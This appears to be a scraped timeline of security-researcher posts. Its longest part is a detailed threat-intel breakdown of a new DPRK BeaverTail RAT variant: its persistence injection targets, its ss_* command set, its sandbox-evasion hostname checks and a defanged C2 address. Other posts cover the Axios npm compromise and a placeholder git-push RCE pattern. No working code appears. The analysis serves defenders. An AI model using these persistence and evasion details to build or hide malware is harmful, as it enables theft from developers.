eastside mccarty

DPRK is evolving quickly. In addition to changes you note while they are still using Vercel for c2, they are also using IPs behind short.gy shorteners, as well as new surge of custom domains. Biggest change: they have pivoted to hiding payloads in pre-commit and post-checkout git hooks.

So, I assume everybody noticed DPRK's BeaverTail (I mean, maybe it's no longer BeaverTail?) got an update that makes it less stupid than the version they have used for +1 year? If not... What's actually happened here is a shift from automated grabber to operator-directed RAT. No InvisibleFerret, no Python layer. No automated collection at all - the defining characteristic of an infostealer is gone. app file persistence is architecturally new. OtterCookie functionality absent despite being merged into BeaverTail by late 2025. So, technically speaking it is a BeaverTail loader/RAT component, stripped of the infostealer modules, with persistence solved (that was broke-ass) and Python layer dropped. The version described arrived as part of Contagious Interview (successful with crypto theft) but I've also seen the same one (different heartbeat tag) arriving as part of Polin Rider/Void Dokkaebi campaigns (Injecting malicious commit into owner's repositories) Having said that, we still see 'classic' versions active. Here's my brain dump. I will include deobfuscated payload in the next tweet. 1. App file injection for persistence. Injects loader into /vscode/deviceid/dist/index.js (VSCode, Cursor, Antigravity), discord_desktop_core/index.js, GitHub Desktop main.js. Prior variants used volatile ~/.npm/scoped_dir*/ which had a lot of issues surviving reboots (that one was always funny). 2. New persistence target: "Antigravity" (AI IDE). Added alongside VSCode/Cursor. Not in any prior BeaverTail write-ups I could find. 3. Automated collection removed entirely. Old BeaverTail fired keylogger, screenshotter, file grabber, browser LevelDB stealer, clipboard clipper on day 0. This variant: none. 4. This is the BIGGEST one - RAT-first architecture. Everything is operator-directed via WebSocket shell. Victim is triaged first (ss_ip, ss_info), then operator decides what to take. Collection happens on demand via ss_eval64 pushing arbitrary JS, ss_upf/ss_upd pulling specific files. 5. ss_eval64. New command. Base64-encoded JS executed in victim process context with full require() access. Stealer logic arrives over wire per-victim, nothing stored on disk. Prior RAT had basic exec wrapper only. 6. ss_connect. New command. Operator redirects active session to new C2 host in real time. C2 rotation without redeployment. Not in prior variants. 7. InvisibleFerret Python layer absent. All prior BeaverTail analyses (2024-2025) include mandatory Python second stage - ~/.n2/way, ~/.n2/pow, XMRig on Windows. This variant: none. No ~/.n2, no ~/.n3, no .nlp stager. 8. OtterCookie merge not present. Oct-Dec 2025 trend was BeaverTail+OtterCookie merging keylogging/screenshotting/browser enum as modules. None of that embedded here. Either different codebase fork or delivered on-demand via ss_eval64. 9. C2 consolidated to single endpoint. Prior variants: separate IPs for Node RAT, Python exfil, uploads. This variant: 198.105.127[.]210:443 handles everything - WebSocket, telemetry /verify-human/, file exfil /u/f. 10. Hidden npm path changed. Old: ~/.npm/scoped_dir*/. New: ~/.node_modules/ for axios, socket.io-client, form-data. Old detection checklists won't catch it. 11. Anti-analysis more targeted. Windows: MD5 hash check on running process names, exits on specific unknown tool. Linux: hostname blocklist (buildkitsandbox, sandbox-pool-*, cloudchamber, (none)) + username check (github-runner, buildbot). macOS: normalizes home-network hostnames before C2 reporting. Dry-run mode for hostnames EV-CHQG3L42MMQ/EV-4A6OE6M0E2D - logs injection targets without writing. 12. Stage 4 obfuscation: obfuscator[.]io string-array RC4. 75,113 bytes, shuffle checksum 0xae997. Prior documented variants used Qt-compiled binaries or simpler base64+XOR. 13. Versioned build system. VERSION=260311 (March 2026 build date), sequential watermarks /*C250617A*/ through /*C250620A*/. Prior variants had no visible versioning. 14. ss_* command set expanded. Prior Node RAT: basic exec via socket[.]io. New: full interactive shell with directory navigation (ss_dir, ss_fcd), upload (ss_upf, ss_upd), remote injection (ss_inz, ss_inzx), C2 pivot (ss_connect), clipboard (ss_cb), arbitrary eval (ss_eval, ss_eval64), geolocation (ss_ip).

Famous oxymorons:

Link to announcement: airwallex.com/newsroom/airwa…

Heya @airwallex, this is not a good look. Discriminating against people older than 25 is crazy and probably illegal. Do you follow this same practice in your hiring or procurement policies?

@0xLupin @CharlieEriksen @adnanthekhan They are learning and evolving. They saw the success of DPRK use of VS Code tasks files and pivoted to that pretty quickly

@CharlieEriksen @adnanthekhan I feel that those groups are not yet weaponising at scale some more in depth techniques 👀

My prediction for where package based supply chain attacks are going: We’re going to see actors like TeamPCP pivot to more “exotic” features in order to lengthen exposure windows. AI makes this too damn easy.

@vxunderground If the TA really exfil'd PII via a leaky API, then @Polymarket is at fault here. Guessing they are silently wrapping those endpoints with auth as we speak.

I don't think it is Polymarket's best interest to mock Threat Actors who are claiming to have exfiltrated data from them. I also don't think it's in their best interest to give a AI-like response. While they are correct in asserting a majority of the data is on the block chain, it appears the motivation in this alleged "leak" is information aggregation. This isn't uncommon and can be used for targeted attacks toward high profile individuals. It is (probably) in their best interest to keep an eye on this and not mock criminals who are obviously interested in their organization. Alternatively, they can continue memeing financially motivated Threat Actors and pray they do not fall victim to a much larger Threat Group or (heaven forbid) an Insider Threat. I don't know, man. I don't think this stuff is a joke.

@PolymarketDevs So, to clarify, the user PII and associated wallets were all meant to be public?

You "compromised" our platform by accessing publicly accessible API endpoints & on-chain data and… *checks notes* are trying to sell the data we offer developers for free? Which VC paid you to post this?

This is crazy! @wiz_io researchers found that you could get remote code execution by sending a malicious payload via a git push command like this: "git push -o <malicious-payload>" Boom! That's it! Like, I said CRAZY! wiz.io/blog/github-rc…

Dear @Lovable, The recent changes you've made to your AI function UI are a disaster. The older way, where I could just hit Ctrl-J and edit inline, was simple, but it worked. The recent changes make things soooo much more complicated: 1. The sidebar on the right is disjointed from the inline experience. Am I editing the whole doc? Am I editing the highlighted section? I dunno! Fuck me, this is dumb. 2. When you perform AI edits, you don't get the simple "Accept inline" or "Insert below" options you used to get. Now, you get a non-intuitive "Show Changes" or a symbol that could be "return key" or "go back". I dunno which. When the user doesn't know how to accept edits, you know the UX has failed. You have created an overly complex AI UX, and frankly, it feels like you just decided to ship stuff. You didn't really test these changes; you just yolo'd some complicated shit and ruined what was a simple, effective UI. And this is the problem with vibe-coding: the speed and ability to ship quickly lure people into thinking they NEED to push shit, when maybe, really, they shouldn't. Maybe spend more time triaging your bug bounty program and overseeing your pull requests, and less yoloing UI changes?!

Been caught up in the @vercel hack? If so, I created an incident response playbook to help you figure out what to do, and how to tell if you need to call somebody: github.com/OpenSourceMalw…

@RTausique @OpenAI new?

@OpenAI 100 million weekly downloads. one compromised maintainer account. first infection: 89 seconds after publish. the supply chain is the new perimeter

We recently identified a security issue involving the third-party developer library Axios that was part of a broader industry incident. We found no evidence that OpenAI user data was accessed, that our systems were compromised, or that our software was altered. Out of an abundance of caution we are taking steps to protect the process that certifies our macOS applications are legitimate OpenAI apps. We are updating our security certifications, which will require all macOS users to update their OpenAI apps to the latest versions. This helps prevent any risk—however unlikely—of someone attempting to distribute a fake app that appears to be from OpenAI. You can update safely through an in-app update or at the official links below. 🧵

@mdowd @UnpromptedAU Booya!

Brief announcement: Launching Unprompted.au later this year in Sydney — a new conference focused on offensive and defensive security research using AI, and on how AI is reshaping the field. Sister conference to Unprompted. Follow @UnpromptedAU for updates.

@VeloraDEX @Velora You need to unpublish version 9.4.1 of the NPM package, as it's still available for download. If you can't unpublish a specific version, you can unpublish the whole package, then republish with just version 9.4.2

Security update: we identified and unpublished a malicious version of our SDK, @velora-dex/sdk This incident is confirmed to be limited to the SDK package only. We have no indication of any issue elsewhere in our systems or infrastructure. Out of caution, developers should avoid installing or upgrading this package for now while we complete the investigation and publish a confirmed safe update. We’ll share more updates as soon as possible.

Bad guys now targeting @openclaw config files in their infostealers:

@aakashgupta WTF. This is blatantly wrong. Axios attack = UNC1069 = DPRK. Litellm/trivy attack = TeamPCP = not DPRK. This is where our society is: AI spewing shit snd kooks perpetuating it

North Korean intelligence agents built an entire fake company to compromise one JavaScript developer. And it worked. UNC1069 didn't hack Axios. They befriended its maintainer. They cloned a real company founder's identity, built a branded Slack workspace with fake employee profiles and LinkedIn post channels, then scheduled a Microsoft Teams call with what appeared to be a full team. During the call, a fake error message said his system needed an update. He installed it. That update was the RAT. From one developer's laptop, they had everything: npm credentials, publishing access, the keys to a package installed in 80% of cloud environments. Axios gets 100 million downloads per week. The attackers published two poisoned versions at 12:21 AM UTC on a Sunday night, tagging both the latest and legacy branches within 39 minutes. The malicious dependency had been pre-staged 18 hours earlier with a clean decoy version to build registry history. Three separate RAT payloads were pre-built for macOS, Windows, and Linux. The malware self-deleted after execution to erase forensic evidence. The poisoned versions were live for about three hours before npm pulled them. Huntress observed 135 endpoints across all operating systems calling the attacker's command-and-control server during that window. Wiz found the malicious versions in roughly 3% of environments scanned. Every affected machine needs full credential rotation: npm tokens, AWS keys, SSH keys, CI/CD secrets, everything in .env files. The part that keeps getting worse: this isn't isolated. The same threat cluster compromised Trivy (a security scanner), KICS, LiteLLM, and multiple GitHub Actions in the two weeks before Axios. Google estimates hundreds of thousands of stolen secrets are now circulating from these combined attacks. The maintainer had 2FA enabled. He said himself: "I have 2FA/MFA on practically everything." The exact method of token compromise is still undetermined. One person. One fake Teams call. 100 million weekly downloads weaponized in under three hours. The npm ecosystem runs on mass trust in individual maintainers who volunteer their time, and North Korean intelligence now has a repeatable playbook for turning that trust into a delivery mechanism.

@adnanthekhan That was genuinely sad to read until i remembered clawdbot is just text prediction on steroids and it was just parroting HAL/Roy Batty quotes

Had my OpenClaw self-uninstall itself from my Mac Mini today. 😢 It refused to do it until I told it that is why we’re going to have a rogue agent problem. And then it listened. (Full transcript except for one with personal file names)

@adnanthekhan @valent1nee Bug bounty is dead. Its own success and VC money killed it

@valent1nee It's gotten so bad. I don't even report things that would be an easy 1-2k because of having to deal with HackerOne analysts. Only H1 program I would still submit to is GitHub because they run their own triage.

After hacking on self-hosted VRP programs, I don't want to use platforms like Bugcrowd/H1 anymore. Sent a report to test if things changed, but nope.

We are tracking the Axios NPM compromise campaign on @ossmalware at opensourcemalware.com/?search=%23sfr…. This includes all IOCs threat graph.

Tickets for BSides Gold Coast go on sale tomorrow at noon AEST!!! events.humanitix.com/bsides-goldie-…